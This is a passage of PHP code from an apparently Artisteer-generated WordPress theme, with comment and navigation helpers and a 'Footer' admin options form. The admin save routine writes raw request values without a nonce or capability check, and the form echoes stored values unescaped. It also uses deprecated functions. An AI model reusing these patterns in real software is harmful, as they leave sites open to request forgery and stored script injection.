    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
